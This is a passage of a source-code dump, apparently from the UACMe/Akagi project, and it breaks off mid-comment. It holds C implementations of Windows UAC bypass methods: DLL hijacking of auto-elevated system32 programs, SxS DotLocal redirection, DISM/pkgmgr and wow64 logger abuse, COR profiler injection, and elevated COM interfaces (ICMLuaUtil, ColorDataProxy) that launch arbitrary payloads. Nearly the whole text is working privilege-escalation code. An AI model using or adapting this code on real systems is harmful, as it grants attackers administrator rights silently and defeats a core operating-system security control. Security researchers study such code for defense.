if (MscBufferPtr) {\n        supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);\n    }\n    if (SnapinData) {\n        supSecureVirtualFree(SnapinData, SnapinSize, NULL);\n    }\n\n    return MethodResult;\n}\n\n/*\n* ucmHakrilMethodCleanup\n*\n* Purpose:\n*\n* Post execution cleanup routine for HakrilMethod\n*\n*/\nBOOL ucmHakrilMethodCleanup(\n    VOID\n)\n{\n    SIZE_T Dummy;\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    _strcpy(szBuffer, g_ctx->szTempDirectory);\n    Dummy = _strlen(szBuffer);\n    _strcat(szBuffer, KAMIKAZE_MSC);\n    DeleteFile(szBuffer);\n\n    Sleep(1000);\n\n    szBuffer[Dummy] = 0;\n    _strcat(szBuffer, KAMIKAZE_LAUNCHER);\n    DeleteFile(szBuffer);\n\n    szBuffer[Dummy] = 0;\n    _strcat(szBuffer, OSK_EXE);\n    return DeleteFile(szBuffer);\n}\n"
  },
  {
    "path": "Source/Akagi/methods/hybrids.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2025\n*\n*  TITLE:       HYBRIDS.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  Hybrid UAC bypass methods.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"makecab.h\"\n#include \"encresource.h\"\n\n/*\n* ucmMethodCleanupSingleItemSystem32\n*\n* Purpose:\n*\n* Post execution cleanup routine.\n*\n*/\nBOOL ucmMethodCleanupSingleItemSystem32(\n    _In_ LPCWSTR lpItemName,\n    _In_opt_ LPCWSTR lpSubDirectory\n)\n{\n    LPWSTR lpDestination;\n    SIZE_T cb;\n    BOOL bResult = FALSE;\n\n    cb = 1 + sizeof(g_ctx->szSystemDirectory);\n    cb += _strlen(lpItemName);\n    if (lpSubDirectory) cb += _strlen(lpSubDirectory);\n\n    cb *= sizeof(WCHAR);\n\n    lpDestination = (LPWSTR)supHeapAlloc(cb);\n    if (lpDestination) {\n\n        _strcpy(lpDestination, g_ctx->szSystemDirectory);\n        if (lpSubDirectory)\n            _strcat(lpDestination, lpSubDirectory);\n\n        _strcat(lpDestination, lpItemName);\n\n        bResult = ucmMasqueradedDeleteDirectoryFileCOM(lpDestination);\n\n        supHeapFree(lpDestination);\n    }\n\n    return bResult;\n}\n\n/*\n* ucmGenericAutoelevationEx\n*\n* Purpose:\n*\n* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll\n*\n*/\nNTSTATUS ucmGenericAutoelevationEx(\n    _In_opt_ LPCWSTR lpTargetApp,\n    _In_ LPCWSTR lpTargetDll,\n    _In_opt_ LPCWSTR lpParameters,\n    _In_opt_ LPCWSTR lpSubDirectory,\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    SIZE_T cb, nLen;\n    LPWSTR 
lpSource, lpDestination;\n\n    //\n    // Allocate source path.\n    //\n    cb = (MAX_PATH * 2) +\n        sizeof(g_ctx->szTempDirectory) +\n        (_strlen(lpTargetDll) * sizeof(WCHAR));\n\n    lpSource = (LPWSTR)supHeapAlloc(cb + sizeof(UNICODE_NULL));\n    if (lpSource == NULL)\n        return STATUS_MEMORY_NOT_ALLOCATED;\n\n    //\n    // Allocate destination path.\n    //\n    cb = sizeof(g_ctx->szSystemDirectory);\n    if (lpSubDirectory)\n        cb += (_strlen(lpSubDirectory) * sizeof(WCHAR));\n\n    cb += (_strlen(lpTargetDll) * sizeof(WCHAR));\n\n    lpDestination = (LPWSTR)supHeapAlloc(cb + sizeof(UNICODE_NULL));\n    if (lpDestination == NULL) {\n        supHeapFree(lpSource);\n        return STATUS_MEMORY_NOT_ALLOCATED;\n    }\n\n    //put target dll\n    _strcpy(lpSource, g_ctx->szTempDirectory);\n    _strcat(lpSource, lpTargetDll);\n    nLen = _strlen(lpSource);\n    lpSource[nLen - 1] = UCM_TRASH_END_CHAR;\n\n    //write proxy dll to disk\n    if (supWriteBufferToFile(lpSource, ProxyDll, ProxyDllSize)) {\n\n        //target dir\n        _strcpy(lpDestination, g_ctx->szSystemDirectory);\n        if (lpSubDirectory)\n            _strcat(lpDestination, lpSubDirectory);\n\n        //drop payload to system32\n        if (ucmMasqueradedMoveFileCOM(lpSource, lpDestination)) {\n\n            _strcpy(lpSource, lpDestination);\n            _strcat(lpSource, lpTargetDll);\n            nLen = _strlen(lpSource);\n            lpSource[nLen - 1] = UCM_TRASH_END_CHAR;\n\n            if (ucmMasqueradedRenameElementCOM(lpSource, lpTargetDll)) {\n\n                //run target app\n                if (lpTargetApp) {\n                    if (supRunProcess2(lpTargetApp,\n                        lpParameters,\n                        NULL,\n                        SW_HIDE,\n                        SUPRUNPROCESS_TIMEOUT_DEFAULT))\n                    {\n                        Sleep(5000);\n                        MethodResult = STATUS_SUCCESS;\n                    }\n 
               }\n                else {\n                    MethodResult = STATUS_SUCCESS;\n                }\n            }\n        }\n    }\n\n    supHeapFree(lpSource);\n    supHeapFree(lpDestination);\n\n    return MethodResult;\n}\n\n/*\n* ucmGenericAutoelevation\n*\n* Purpose:\n*\n* Bypass UAC by abusing target autoelevated system32 application via missing system32 dll\n*\n*/\nNTSTATUS ucmGenericAutoelevation(\n    _In_opt_ LPCWSTR lpTargetApp,\n    _In_ LPCWSTR lpTargetDll,\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    return ucmGenericAutoelevationEx(lpTargetApp,\n        lpTargetDll,\n        NULL,\n        NULL,\n        ProxyDll,\n        ProxyDllSize);\n\n}\n\n/*\n* ucmSXSMethod\n*\n* Purpose:\n*\n* Exploit SXS Local Redirect feature.\n*\n* SXS/Fusion uses dll redirection, attempting to load internal manifest dependencies from\n* non existent directory (this is so called DotLocal dll redirection), it is trying to do this\n* before going to WinSXS store.\n*\n* In this case dependency is Microsoft.Windows.Common-Controls.\n*\n* Maybe you think it is handy cool feature, but I think its another backdoor from lazy dotnet crew.\n* \"You keep shipping crap, and crap, and more crap\".\n*\n*/\nNTSTATUS ucmSXSMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize,\n    _In_opt_ LPWSTR lpTargetDirectory, //single element in system32 with slash at end\n    _In_ LPWSTR lpTargetApplication, //executable name\n    _In_opt_ LPWSTR lpLaunchApplication, //executable name, must be in same dir as lpTargetApplication\n    _In_ BOOL bConsentItself\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    WCHAR* lpszFullDllPath = NULL, * lpszDirectoryName = NULL;\n    SIZE_T   sz;\n    LPWSTR   lpSxsPath = NULL;\n\n    WCHAR szSrc[MAX_PATH * 2], szDst[MAX_PATH * 2];\n    WCHAR szCurDir[MAX_PATH * 2];\n\n    SXS_SEARCH_CONTEXT sctx;\n\n    if (lpTargetApplication == NULL)\n        return STATUS_INVALID_PARAMETER_3;\n\n    if 
(_strlen(lpTargetApplication) > MAX_PATH)\n        return STATUS_INVALID_PARAMETER_3;\n\n    do {\n\n        //\n        // Patch Fubuki to the new entry point\n        //\n        if (!supReplaceDllEntryPoint(ProxyDll,\n            ProxyDllSize,\n            FUBUKI_ENTRYPOINT_SXS,\n            FALSE))\n        {\n            break;\n        }\n\n        //common part, locate sxs dll, drop payload to temp\n        RtlSecureZeroMemory(szSrc, sizeof(szSrc));\n        RtlSecureZeroMemory(szDst, sizeof(szDst));\n\n        sz = UNICODE_STRING_MAX_BYTES;\n\n        lpszFullDllPath = (WCHAR*)supVirtualAlloc(\n            &sz,\n            DEFAULT_ALLOCATION_TYPE,\n            DEFAULT_PROTECT_TYPE,\n            NULL);\n\n        if (lpszFullDllPath == NULL)\n            break;\n\n        sctx.DllName = COMCTL32_DLL;\n        sctx.SxsKey = COMCTL32_SXS;\n        sctx.FullDllPath = lpszFullDllPath;\n\n        if (!sxsFindLoaderEntry(&sctx))\n            break;\n\n        lpszDirectoryName = _filename(lpszFullDllPath);\n        if (lpszDirectoryName == NULL)\n            break;\n\n        sz = PAGE_SIZE + (_strlen(lpszDirectoryName) * sizeof(WCHAR));\n\n        lpSxsPath = (LPWSTR)supVirtualAlloc(\n            &sz,\n            DEFAULT_ALLOCATION_TYPE,\n            DEFAULT_PROTECT_TYPE,\n            NULL);\n\n        if (lpSxsPath == NULL)\n            break;\n\n        _strcpy(lpSxsPath, g_ctx->szSystemDirectory);\n        if (lpTargetDirectory) {\n            _strcat(lpSxsPath, lpTargetDirectory);\n        }\n        _strcpy(szDst, lpTargetApplication);\n\n        //\n        // Workaround for consent, so it won't ban itself.\n        // Create all files and target directories with fake root name.\n        // Next when all fileop is done, rename fake root to real.\n        //\n        if (bConsentItself) {\n            _strcat(szDst, FAKE_LOCAL_SXS);\n        }\n        else {\n            _strcat(szDst, LOCAL_SXS);\n        }\n\n        //create local directory\n        if 
(!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, szDst))\n            break;\n\n        //create assembly directory\n        _strcat(lpSxsPath, szDst);\n        if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, lpszDirectoryName))\n            break;\n      \n        _strcat(lpSxsPath, TEXT(\"\\\\\"));\n        _strcat(lpSxsPath, lpszDirectoryName);\n\n        if (!ucmMasqueradedSetObjectSecurityCOM(lpSxsPath,\n            DACL_SECURITY_INFORMATION,\n            SE_FILE_OBJECT,\n            T_SDDL_ALL_FOR_EVERYONE))\n        {\n            break;\n        }\n\n        //move payload file\n\n        GetCurrentDirectory(MAX_PATH * 2, szCurDir);\n\n        SetCurrentDirectory(lpSxsPath);\n\n        if (!supWriteBufferToFile(COMCTL32_DLL, ProxyDll, ProxyDllSize))\n            break;\n\n        SetCurrentDirectory(szCurDir);\n\n        //\n        // Consent workaround end. \n        // Restore real directory name.\n        //\n        if (bConsentItself) {\n            _strcpy(lpSxsPath, g_ctx->szSystemDirectory);\n            if (lpTargetDirectory) {\n                _strcat(lpSxsPath, lpTargetDirectory);\n            }\n            _strcat(lpSxsPath, lpTargetApplication);\n            _strcat(lpSxsPath, FAKE_LOCAL_SXS);\n\n            _strcpy(szDst, lpTargetApplication);\n            _strcat(szDst, LOCAL_SXS);\n\n            if (!ucmMasqueradedRenameElementCOM(lpSxsPath, szDst))\n                break;\n\n        }\n\n        //run target process\n        _strcpy(szDst, g_ctx->szSystemDirectory);\n        if (lpTargetDirectory) {\n            _strcat(szDst, lpTargetDirectory);\n        }\n\n        if (lpLaunchApplication) {\n            _strcat(szDst, lpLaunchApplication);\n        }\n        else {\n            _strcat(szDst, lpTargetApplication);\n        }\n\n        if (supRunProcess2(szDst, \n            NULL, \n            NULL, \n            SW_SHOWNORMAL, \n            1000))\n        {\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while 
(FALSE);\n\n    if (lpszFullDllPath) supVirtualFree(lpszFullDllPath, NULL);\n    if (lpSxsPath) supVirtualFree(lpSxsPath, NULL);\n\n    return MethodResult;\n}\n\n/*\n* ucmSXSMethodCleanup\n*\n* Purpose:\n*\n* Post execution cleanup routine for SXSMethod.\n*\n*/\nBOOL ucmSXSMethodCleanup(\n    VOID\n)\n{\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    _strcpy(szBuffer, g_ctx->szSystemDirectory);\n    _strcat(szBuffer, CONSENT_EXE);\n    _strcat(szBuffer, LOCAL_SXS);\n\n    return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);\n}\n\n/*\n* ucmxDisemer\n*\n* Purpose:\n*\n* Build parameters to the pkgmgr and force it to start dism.exe.\n* \n* Note: \n* Name is a very original WD behavior signature name.\n*\n*/\nNTSTATUS ucmxDisemer()\n{\n    WCHAR szApplication[MAX_PATH * 2];\n    WCHAR szParameters[256];\n\n    _strcpy(szApplication, g_ctx->szSystemDirectory);\n    _strcat(szApplication, PKGMGR_EXE);\n\n    _strcpy(szParameters, TEXT(\"/ip\"));\n    _strcat(szParameters, TEXT(\" /m:\"));\n    _strcat(szParameters, MYSTERIOUSCUTETHING);\n    _strcat(szParameters, TEXT(\" /quiet\"));\n\n    if (supRunProcess2(szApplication, \n        szParameters, \n        NULL, \n        SW_HIDE, \n        SUPRUNPROCESS_TIMEOUT_DEFAULT)) \n    {\n        return STATUS_SUCCESS;\n    }\n\n    return STATUS_ACCESS_DENIED;\n}\n\n#define DISM_DLL_NAMES 2\nLPCWSTR g_DismTargets[DISM_DLL_NAMES] = {\n    DISMCORE_DLL,\n    APISET_KERNEL32LEGACY\n};\n\n/*\n* ucmDismMethodCleanup\n*\n* Purpose:\n*\n* Cleanup routine for Dism method.\n*\n*/\nVOID ucmDismMethodCleanup(VOID)\n{\n    DWORD i, cNames;\n    cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 
1 : DISM_DLL_NAMES;\n\n    for (i = 0; i < cNames; i++) {\n        ucmMethodCleanupSingleItemSystem32(g_DismTargets[i], NULL);\n    }\n}\n\n/*\n* ucmDismMethod\n*\n* Purpose:\n*\n* Exploit DISM application dll loading scheme.\n*\n* Dism.exe is located in the system32 folder while its dlls are in system32\\dism.\n* When loaded, dism first attempts to load dlls from the system32 folder.\n*\n* Trigger: pkgmgr.exe\n* PkgMgr.exe is an autoelevated whitelisted application which actually just calls Dism.exe\n*\n*/\nNTSTATUS ucmDismMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    DWORD i, cNames;\n    SIZE_T  nLen;\n\n    WCHAR   szSource[MAX_PATH * 2];\n\n    cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;\n    \n    for (i = 0; i < cNames; i++) {\n\n        MethodResult = ucmGenericAutoelevation(NULL,\n            g_DismTargets[i],\n            ProxyDll,\n            ProxyDllSize);\n\n        if (NT_SUCCESS(MethodResult)) {\n            MethodResult = ucmxDisemer();\n        }\n\n        //\n        // Cleanup temp.\n        //\n        if (!NT_SUCCESS(MethodResult)) {\n            _strcpy(szSource, g_ctx->szTempDirectory);\n            _strcat(szSource, g_DismTargets[i]);\n            nLen = _strlen(szSource);\n            szSource[nLen - 1] = UCM_TRASH_END_CHAR;\n            DeleteFile(szSource);\n        }\n\n        Sleep(1000);\n    }\n\n    return MethodResult;\n}\n\n/*\n* ucmWow64LoggerMethod\n*\n* Purpose:\n*\n* Bypass UAC using wow64 logger dll and wow64 application.\n*\n* Trigger: 32bit version of wusa.exe\n* Loader will map and call our logger dll during wow64 process initialization.\n*\n*/\nNTSTATUS ucmWow64LoggerMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    WCHAR szTarget[MAX_PATH * 2];\n\n    //\n    // Build target application full path.\n    // We need autoelevated application from syswow64 folder ONLY.\n    //\n    _strcpy(szTarget, 
USER_SHARED_DATA->NtSystemRoot);\n    _strcat(szTarget, SYSWOW64_DIR);\n    _strcat(szTarget, WUSA_EXE);\n\n    //\n    // Attempt to remove payload dll after execution in method.c!PostCleanupAttempt.\n    // Warning: every wow64 application will load payload code (some will crash).\n    // Remove file IMMEDIATELY after work.\n    //\n\n    return ucmGenericAutoelevation(szTarget,\n        WOW64LOG_DLL,\n        ProxyDll,\n        ProxyDllSize);\n}\n\n/*\n* ucmUiAccessMethod\n*\n* Purpose:\n*\n* Bypass UAC using uiAccess(true) application.\n* Original method source\n* https://habrahabr.ru/company/pm/blog/328008/\n*\n*/\nNTSTATUS ucmUiAccessMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    SIZE_T Length;\n    LPWSTR lpEnv = NULL, lpTargetDll;\n    UNICODE_STRING uStr = RTL_CONSTANT_STRING(L\"ProgramFiles=\");\n    WCHAR szTarget[MAX_PATH * 2];\n    WCHAR szSource[MAX_PATH * 2];\n\n    do {\n\n        //\n        // There is no osksupport.dll in Windows 7.\n        //\n        if (g_ctx->dwBuildNumber < NT_WIN8_RTM)\n            lpTargetDll = DUSER_DLL;\n        else\n            lpTargetDll = OSKSUPPORT_DLL;\n\n        //\n        // Replace default Fubuki dll entry point with new.\n        //\n        if (!supReplaceDllEntryPoint(ProxyDll,\n            ProxyDllSize,\n            FUBUKI_EXT_ENTRYPOINT,\n            FALSE))\n        {\n            break;\n        }\n\n        //\n        // Drop modified Fubuki to the %temp%\n        //\n        RtlSecureZeroMemory(szSource, sizeof(szSource));\n        _strcpy(szSource, g_ctx->szTempDirectory);\n        _strcat(szSource, lpTargetDll);\n        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize))\n            break;\n\n        //\n        // Build target path in g_lpIncludePFDirs\n        //\n        lpEnv = supQueryEnvironmentVariableOffset(&uStr);\n        if (lpEnv == NULL)\n            break;\n\n        Length = _strlen(lpEnv);\n    
    if ((Length == 0) || (Length > MAX_PATH))\n            break;\n\n        RtlSecureZeroMemory(&szTarget, sizeof(szTarget));\n        _strncpy(szTarget, MAX_PATH, lpEnv, MAX_PATH);\n        _strcat(szTarget, TEXT(\"\\\\\"));\n        _strcat(szTarget, T_WINDOWSMEDIAPLAYER);\n        _strcat(szTarget, TEXT(\"\\\\\"));\n\n        //\n        // In case if Media Player is not installed / available.\n        //\n        if (!PathFileExists(szTarget)) {\n            if (!ucmMasqueradedCreateSubDirectoryCOM(lpEnv, T_WINDOWSMEDIAPLAYER))\n                break;\n        }\n\n        //\n        // Copy Fubuki to target directory.\n        // \n        if (!ucmMasqueradedMoveFileCOM(szSource, szTarget))\n            break;\n\n        //\n        // Copy osk.exe to Program Files\\Windows Media Player\n        //\n        RtlSecureZeroMemory(szSource, sizeof(szSource));\n        _strcpy(szSource, g_ctx->szSystemDirectory);\n        _strcat(szSource, OSK_EXE);\n        if (!ucmMasqueradedMoveCopyFileCOM(szSource, szTarget, FALSE))\n            break;\n\n        //\n        // Run uiAccess osk.exe from Program Files.\n        //\n        _strcat(szTarget, OSK_EXE);\n        if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, 0)) {\n            //\n            // Run eventvwr.exe as final trigger.\n            // Spawns mmc.exe with eventvwr.msc snap-in.\n            //\n            _strcpy(szTarget, g_ctx->szSystemDirectory);\n            _strcat(szTarget, EVENTVWR_EXE);\n            if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, 0))\n                MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    return MethodResult;\n}\n\n/*\n* ucmSXSDccwMethod\n*\n* Purpose:\n*\n* Similar to ucmSXSMethod, except using different target app and dll.\n* Dccw idea by Ernesto Fernandez (https://github.com/L3cr0f/DccwBypassUAC)\n*\n*/\nNTSTATUS ucmSXSDccwMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = 
STATUS_ACCESS_DENIED;\n    BOOL     bWusaNeedCleanup = FALSE;\n    HMODULE  hGdiPlus = NULL;\n    WCHAR* lpszFullDllPath = NULL, * lpszDirectoryName = NULL;\n    SIZE_T   sz;\n    LPWSTR   lpSxsPath = NULL, lpEnd;\n\n    WCHAR szBuffer[MAX_PATH * 2], szTarget[MAX_PATH * 2];\n\n    SXS_SEARCH_CONTEXT sctx;\n\n    do {\n        //\n        // Check if target app available. Maybe unavailable in server edition.\n        //\n        _strcpy(szTarget, g_ctx->szSystemDirectory);\n        _strcat(szTarget, DCCW_EXE);\n        if (!PathFileExists(szTarget)) {\n            MethodResult = STATUS_OBJECT_NAME_NOT_FOUND;\n            break;\n        }\n\n        //\n        // Load GdiPlus in our address space to get it full path.\n        //\n        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n        _strcpy(szBuffer, g_ctx->szSystemDirectory);\n        _strcat(szBuffer, GDIPLUS_DLL);\n        hGdiPlus = LoadLibrary(szBuffer);\n        if (hGdiPlus == NULL) {\n            MethodResult = STATUS_DLL_NOT_FOUND;\n            break;\n        }\n\n        sz = UNICODE_STRING_MAX_BYTES;\n\n        lpszFullDllPath = (WCHAR*)supVirtualAlloc(\n            &sz,\n            DEFAULT_ALLOCATION_TYPE,\n            DEFAULT_PROTECT_TYPE,\n            NULL);\n\n        if (lpszFullDllPath == NULL)\n            break;\n\n        sctx.DllName = GDIPLUS_DLL;\n        sctx.SxsKey = GDIPLUS_SXS;\n        sctx.FullDllPath = lpszFullDllPath;\n\n        if (!sxsFindLoaderEntry(&sctx)) {\n            MethodResult = STATUS_SXS_KEY_NOT_FOUND;\n            break;\n        }\n\n        lpszDirectoryName = _filename(lpszFullDllPath);\n        if (lpszDirectoryName == NULL)\n            break;\n\n        sz = _strlen(lpszDirectoryName) * sizeof(WCHAR);\n        sz += PAGE_SIZE;\n\n        lpSxsPath = (LPWSTR)supVirtualAlloc(\n            &sz,\n            DEFAULT_ALLOCATION_TYPE,\n            DEFAULT_PROTECT_TYPE,\n            NULL);\n\n        if (lpSxsPath == NULL)\n            break;\n\n        //\n 
       // Create DotLocal path.\n        //\n        _strcpy(lpSxsPath, DCCW_EXE);\n        _strcat(lpSxsPath, LOCAL_SXS);\n        _strcat(lpSxsPath, TEXT(\"\\\\\"));\n        _strcat(lpSxsPath, lpszDirectoryName);\n        _strcat(lpSxsPath, TEXT(\"\\\\\"));\n        _strcat(lpSxsPath, GDIPLUS_DLL);\n\n        //\n        // Create fake cab file.\n        //\n        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        _strcat(szBuffer, GDIPLUS_DLL);\n\n        bWusaNeedCleanup = ucmCreateCabinetForSingleFile(\n            szBuffer,\n            ProxyDll,\n            ProxyDllSize,\n            lpSxsPath);\n\n        if (!bWusaNeedCleanup)\n            break;\n\n        _strcpy(szBuffer, g_ctx->szSystemDirectory);\n        lpEnd = _strend(szBuffer);\n        if (*(lpEnd - 1) == TEXT('\\\\'))\n            *(lpEnd - 1) = TEXT('\\0');\n\n        if (!ucmWusaExtractViaJunction(szBuffer))\n            break;\n\n        Sleep(2000);\n\n        //\n        // Run target.\n        //\n        if (supRunProcess(szTarget, NULL))\n            MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    //\n    // Cleanup resources.\n    //\n    if (hGdiPlus != NULL) FreeLibrary(hGdiPlus);\n    if (lpszFullDllPath) supVirtualFree(lpszFullDllPath, NULL);\n    if (lpSxsPath) supVirtualFree(lpSxsPath, NULL);\n    if (bWusaNeedCleanup) ucmWusaCabinetCleanup();\n\n    return MethodResult;\n}\n\n/*\n* ucmSXSDccwMethodCleanup\n*\n* Purpose:\n*\n* Post execution cleanup routine for SXSDccwMethod.\n*\n*/\nBOOL ucmSXSDccwMethodCleanup(\n    VOID\n)\n{\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    _strcpy(szBuffer, g_ctx->szSystemDirectory);\n    _strcat(szBuffer, DCCW_EXE);\n    _strcat(szBuffer, LOCAL_SXS);\n\n    return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);\n}\n\n/*\n* ucmCorProfilerMethod\n*\n* Purpose:\n*\n* Bypass UAC using COR profiler.\n* http://seclists.org/fulldisclosure/2017/Jul/11\n*\n*/\nNTSTATUS 
ucmCorProfilerMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n\n    SIZE_T   sz = 0;\n    GUID     guid;\n    HKEY     hKey = NULL;\n    LRESULT  lResult;\n    LPOLESTR OutputGuidString = NULL;\n\n    WCHAR szBuffer[MAX_PATH * 2], szRegBuffer[MAX_PATH * 4];\n\n    do {\n        //\n        // Create unique GUID\n        //\n        if (CoCreateGuid(&guid) != S_OK)\n            break;\n\n        if (StringFromCLSID(&guid, &OutputGuidString) != S_OK)\n            break;\n\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        _strcat(szBuffer, MYSTERIOUSCUTETHING);\n        _strcat(szBuffer, TEXT(\".dll\"));\n        if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))\n            break;\n\n        supSetEnvVariable(FALSE, NULL, COR_ENABLE_PROFILING, TEXT(\"1\"));\n        supSetEnvVariable(FALSE, NULL, COR_PROFILER, OutputGuidString);\n\n        if (g_ctx->dwBuildNumber >= NT_WIN8_RTM) {\n            supSetEnvVariable(FALSE, NULL, COR_PROFILER_PATH, szBuffer);\n        }\n        else {\n            //\n            // On Windows 7 target written on 3+ dotnet, registration required.\n            //\n            _strcpy(szRegBuffer, T_REG_SOFTWARECLASSESCLSID);\n            _strcat(szRegBuffer, OutputGuidString);\n            _strcat(szRegBuffer, T_REG_INPROCSERVER32);\n\n            hKey = NULL;\n            lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szRegBuffer, 0, NULL,\n                REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);\n            if (lResult == ERROR_SUCCESS) {\n\n                sz = (1 + _strlen(szBuffer)) * sizeof(WCHAR);\n                lResult = RegSetValueEx(hKey,\n                    TEXT(\"\"),\n                    0,\n                    REG_SZ,\n                    (BYTE*)szBuffer,\n                    (DWORD)sz);\n\n                if (lResult == ERROR_SUCCESS) {\n\n                    _strcpy(szRegBuffer, T_APARTMENT);\n                
    sz = (1 + _strlen(szRegBuffer)) * sizeof(WCHAR);\n                    RegSetValueEx(hKey,\n                        T_THREADINGMODEL,\n                        0,\n                        REG_SZ,\n                        (BYTE*)szRegBuffer,\n                        (DWORD)sz);\n\n                }\n\n                RegCloseKey(hKey);\n            }\n        }\n\n        //\n        // Load target app and trigger cor profiler, eventvwr snap-in is written in the dotnet.\n        //\n        if (supRunProcess2(MMC_EXE,\n            EVENTVWR_MSC,\n            NULL,\n            SW_SHOW,\n            SUPRUNPROCESS_TIMEOUT_DEFAULT))\n        {\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    //\n    // Cleanup.\n    //\n    if (OutputGuidString != NULL) {\n        supSetEnvVariable(TRUE, NULL, COR_PROFILER, NULL);\n        CoTaskMemFree(OutputGuidString);\n    }\n\n    supSetEnvVariable(TRUE, NULL, COR_ENABLE_PROFILING, NULL);\n\n    if (g_ctx->dwBuildNumber >= NT_WIN8_RTM)\n        supSetEnvVariable(TRUE, NULL, COR_PROFILER_PATH, NULL);\n\n    return MethodResult;\n}\n\n/*\n* ucmDccwCOMMethod\n*\n* Purpose:\n*\n* Bypass UAC using ColorDataProxy/CCMLuaUtil undocumented COM interfaces.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nNTSTATUS ucmDccwCOMMethod(\n    _In_ LPWSTR lpszPayload\n)\n{\n    NTSTATUS         MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT          r = E_FAIL, hr_init;\n\n    SIZE_T           sz = 0;\n\n    ICMLuaUtil* CMLuaUtil = NULL;\n    IColorDataProxy* ColorDataProxy = NULL;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        sz = _strlen(lpszPayload);\n        if (sz == 0) {\n            MethodResult = STATUS_INVALID_PARAMETER;\n            break;\n        }\n\n        //\n        // Create elevated COM object for CMLuaUtil.\n        //\n        r = ucmAllocateElevatedObject(\n            T_CLSID_CMSTPLUA,\n           
 &IID_ICMLuaUtil,\n            CLSCTX_LOCAL_SERVER,\n            &CMLuaUtil);\n\n        if (r != S_OK) {\n            break;\n        }\n\n        if (CMLuaUtil == NULL) {\n            break;\n        }\n\n        //\n        // Write new custom calibrator value to HKLM.\n        //\n        r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil,\n            HKEY_LOCAL_MACHINE,\n            T_DISPLAY_CALIBRATION,\n            T_CALIBRATOR_VALUE,\n            lpszPayload);\n\n        if (FAILED(r)) {\n            break;\n        }\n\n        //\n        // Create elevated COM object for ColorDataProxy.\n        //\n        r = ucmAllocateElevatedObject(\n            T_CLSID_ColorDataProxy,\n            &IID_IColorDataProxy,\n            CLSCTX_LOCAL_SERVER,\n            &ColorDataProxy);\n\n\n        if (r != S_OK) {\n            break;\n        }\n\n        if (ColorDataProxy == NULL) {\n            break;\n        }\n\n        //\n        // Run our \"custom calibrator\".\n        //\n        r = ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0);\n\n        if (SUCCEEDED(r))\n            MethodResult = STATUS_SUCCESS;\n\n        Sleep(1000);\n\n        //\n        // Remove calibrator value.\n        //\n        CMLuaUtil->lpVtbl->DeleteRegistryStringValue(CMLuaUtil,\n            HKEY_LOCAL_MACHINE,\n            T_DISPLAY_CALIBRATION,\n            T_CALIBRATOR_VALUE);\n\n    } while (FALSE);\n\n    if (CMLuaUtil != NULL) {\n        CMLuaUtil->lpVtbl->Release(CMLuaUtil);\n    }\n\n    if (ColorDataProxy != NULL) {\n        ColorDataProxy->lpVtbl->Release(ColorDataProxy);\n    }\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return MethodResult;\n}\n\n/*\n* ucmJunctionMethod\n*\n* Purpose:\n*\n* Bypass UAC using two different steps:\n*\n* 1) Create wusa.exe race condition and force wusa to copy files to the protected directory using NTFS reparse point.\n* 2) Disemer\n*\n* Wusa race condition in combination with junctions found by Thomas 
